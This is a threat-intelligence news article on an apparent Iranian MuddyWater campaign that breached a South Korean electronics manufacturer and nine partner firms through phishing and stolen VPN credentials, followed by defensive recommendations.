Iranian state-sponsored threat group MuddyWater — also tracked as Seedworm and Earth Vetala — maintained persistent access inside a major South Korean electronics manufacturer’s network for more than a week before detection, using the initial compromise as a pivot point to breach nine connected organisations in the target’s supplier and partner network. The campaign represents an escalation in MuddyWater’s Asian targeting beyond its traditional Middle East and Central Asia focus.
Campaign Detail
The initial intrusion used a spear-phishing campaign targeting the manufacturer’s procurement department — a typical MuddyWater initial access approach. The phishing lure mimicked a component tender from a known supplier, delivering a macro-enabled document that deployed a MuddyWater-associated PowerShell downloader. From the initial foothold on a procurement workstation, the group performed credential dumping to obtain service account credentials and moved laterally to domain controllers and the organisation’s supplier portal infrastructure.
The nine secondary organisations were compromised via VPN access using credentials stolen from the primary target’s partner access system — a tactic that exploits the trust inherent in B2B supplier connectivity. Symantec’s Threat Intelligence team detected the campaign after observing anomalous PowerShell execution patterns consistent with MuddyWater’s known POWERSTATS and BugSleep tooling.
Attribution
MuddyWater is assessed by multiple intelligence agencies — including CISA, NSA, and NCSC — as a subordinate element of Iran’s Ministry of Intelligence and Security (MOIS). Whilst the group has historically focused on telecommunications, government, and defence targets across the Middle East and Central Asia, this campaign reflects a broadening of targeting to East Asian technology and electronics manufacturers — likely aligned with Iran’s interest in semiconductor supply chains and dual-use technology acquisition.
The electronics manufacturer targeted holds patents and manufacturing processes related to memory chip production and display technologies. South Korean electronics firms have become an increasingly prominent target for state-sponsored industrial espionage.
Recommended Actions
- Supplier portal review: Organisations operating B2B supplier portals or partner VPN access should audit active sessions and credentials shared with suppliers. Rotate any credentials that cannot be attributed to active, named users.
- Living-off-the-land detection: MuddyWater’s lateral movement relies heavily on PowerShell, WMI, and legitimate remote management tools. Review PowerShell execution policies and enable Script Block Logging if not already active. Alert on PowerShell spawned from Office applications.
- Partner risk assessment: If your organisation maintains VPN or portal connectivity to electronics manufacturers or technology suppliers in the Asia-Pacific region, review whether anomalous access from those connections has occurred in the past 30 days.
- Phishing resilience: Procurement departments are a high-value target for initial access given their frequent receipt of external documents. Ensure macro execution is disabled by policy and that suspicious attachment delivery is logged and alerted.
Share this article